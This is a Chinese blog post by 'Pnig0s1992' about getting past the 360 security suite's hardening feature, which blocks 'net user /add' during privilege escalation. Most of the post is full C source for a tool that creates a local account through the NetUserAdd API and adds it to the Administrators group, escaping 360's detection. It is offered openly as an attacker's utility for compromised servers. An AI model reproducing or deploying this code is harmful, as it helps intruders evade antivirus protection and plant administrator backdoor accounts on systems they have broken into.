突破360防黑加固添加用户

Pnig0s1992 p.s:360功能多，现在大多管理员图省事喜欢安个360。360有个防黑加固功能比较坑爹，提权的时候经常会用到net user xxx xxx /add&net localgroup xxx xxx/add.360会拦截,如图:

net user 和 net1 user 都被拦截了，改名执行也拦截，想想这功能也不能这么鸡肋。当然360还会拦截其他命令，这次只对net user xxx xx /add做讨论。于是索性自己用C写一个吧，果断被360无视了，如图:

源码：

//Code by Pnig0s1992
//Date:2012,3,17
#include <stdio.h>
#include <Windows.h>
#include <lm.h>

#pragma comment(lib,"Netapi32.lib")

int AddUser(LPWSTR lpUsername,LPWSTR lpPassword,LPWSTR lpServerName);
int SetGroup(LPWSTR lpUsername,LPWSTR lpServerName,LPWSTR lpGroupName);
BOOL ImprovePriv(LPWSTR name);

int main(INT argc,char * argv[])
{
    BOOL bResult = ImprovePriv(SE_MACHINE_ACCOUNT_NAME);
    if(argc < 3)
    {
        printf("\nCode by Pnig0s1992");
        printf("\nUsage:");
        printf("\n\t%s UserName Password",argv[0]);
        printf("\n\tRemark:Default add to Group:Administrators.");
        return -1;
    }
    if(bResult)
    {
        printf("Successfully promote priv!");
    }else
    {
        printf("Failed promote priv.");
        return -1;
    }
    int Namesize=MultiByteToWideChar(CP_ACP,0,argv[1],-1,NULL,0);
    wchar_t *wUserName =new wchar_t[Namesize+1];
    if(!MultiByteToWideChar(CP_ACP,0,argv[1],-1,wUserName,Namesize))
    {
        return false;
    }
    int Passsize=MultiByteToWideChar(CP_ACP,0,argv[2],-1,NULL,0);
    wchar_t *wPassword =new wchar_t[Passsize+1];
    if(!MultiByteToWideChar(CP_ACP,0,argv[2],-1,wPassword,Passsize))
    {
        return false;
    }
    LPTSTR lpName = wUserName;
    LPTSTR lpPassword = wPassword;
    LPWSTR lpSevName = NULL;
    LPWSTR lpGroupName = L"Administrators";
    AddUser(lpName,lpPassword,lpSevName);
    SetGroup(lpName,lpSevName,lpGroupName);
    return 0;
}

BOOL ImprovePriv(LPWSTR name)
{
    HANDLE hToken;
    if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken))
    {
        printf("\nGet process token failed.(%d)",GetLastError());
        return FALSE;
    }
    TOKEN_PRIVILEGES tkp;
    tkp.PrivilegeCount = 1;
    if(!LookupPrivilegeValue(NULL,name,&tkp.Privileges[0].Luid))
    {
        printf("\nLookup process priv failed.(%d)",GetLastError());
        return FALSE;
    }
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if(!AdjustTokenPrivileges(hToken,FALSE,&tkp,0,NULL,NULL))
    {
        printf("\nAjust process priv failed.(%d)",GetLastError());
        return FALSE;
    }
    CloseHandle(hToken);
    return TRUE;
}

int AddUser(LPWSTR lpUsername,LPWSTR lpPassword,LPWSTR lpServerName)
{
    USER_INFO_1 ui;
    DWORD dwLevel = 1;
    DWORD dwError = 0;
    NET_API_STATUS nStatus;
    ui.usri1_name = lpUsername;
    ui.usri1_password = lpPassword;
    ui.usri1_priv = USER_PRIV_USER;
    ui.usri1_home_dir = NULL;
    ui.usri1_comment = NULL;
    ui.usri1_flags  = UF_SCRIPT;
    ui.usri1_script_path  = NULL;
    nStatus = NetUserAdd(lpServerName,dwLevel,(LPBYTE)&ui,&dwError);
    if(nStatus == NERR_Success)
    {
        printf("\nAdd user:%S successfully!",lpUsername);
    }else
    {
        printf("\nAdd user failed:%d.",nStatus);
    }
    return 0;
}

int SetGroup(LPWSTR lpUsername,LPWSTR lpServerName,LPWSTR lpGroupName)
{
    NET_API_STATUS nStatus;
    LOCALGROUP_MEMBERS_INFO_3  lgui;
    lgui.lgrmi3_domainandname = lpUsername;
    nStatus = NetLocalGroupAddMembers(lpServerName,lpGroupName,3,(LPBYTE)&lgui,1);

    if(nStatus == NERR_Success)
    {
        printf("\nSuccessfully set USER:%S to GROUP:%S!",lpUsername,lpGroupName);
    }else if(nStatus == NERR_GroupNotFound)
    {
        printf("\nCan't find such a group:%S.",lpGroupName);
    }else
    {
        printf("\nSet GROUP:%S failed.",lpGroupName);
    }
    return 0;
}